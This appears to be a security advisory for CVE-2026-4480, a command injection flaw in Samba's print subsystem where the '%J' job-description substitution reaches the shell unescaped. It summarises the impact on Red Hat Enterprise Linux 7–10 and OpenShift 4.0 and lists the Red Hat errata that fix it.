CVE-2026-4480
Overview
This vulnerability is a command injection flaw originating from improper sanitization of shell meta characters in the Samba printing subsystem. Specifically, the Samba "print command" setting uses the "%J" substitution to insert the client-controlled job description string without escaping shell special characters. This lack of input validation in the print job description parameter enables exploitation. The affected component is the Samba print subsystem handling print job descriptions on Red Hat Enterprise Linux versions 7 through 10 and OpenShift Container Platform 4.0.
Vulnerability Description
A flaw was found in the Samba printing subsystem. Samba passes the client-controlled job description string to the command configured with the "print command" setting via the "%J" substitution character without escaping shell meta characters. A remote attacker could exploit this vulnerability by sending a specially crafted print job description that contains unescaped shell characters. This could lead to remote code execution on the affected system.
Impact
An unauthenticated remote attacker can execute arbitrary shell commands on the affected system by sending a specially crafted print job description to the Samba print service. This results in full system compromise, including the ability to manipulate files, escalate privileges, and move laterally within the network. No user interaction or prior access is required, enabling remote code execution with the privileges of the Samba service. This can lead to data breaches, service disruption, and complete loss of system integrity.
Solution
Apply the security updates provided in Red Hat advisories RHSA-2026:22644, RHSA-2026:22963, RHSA-2026:25049, RHSA-2026:25979, and RHSA-2026:28053, which address this vulnerability in Samba and related packages on Red Hat Enterprise Linux versions 7 through 10 and OpenShift Container Platform 4.0. Detailed patch instructions and package versions are available at https://access.redhat.com/errata/. No alternative workarounds are specified in the advisories.
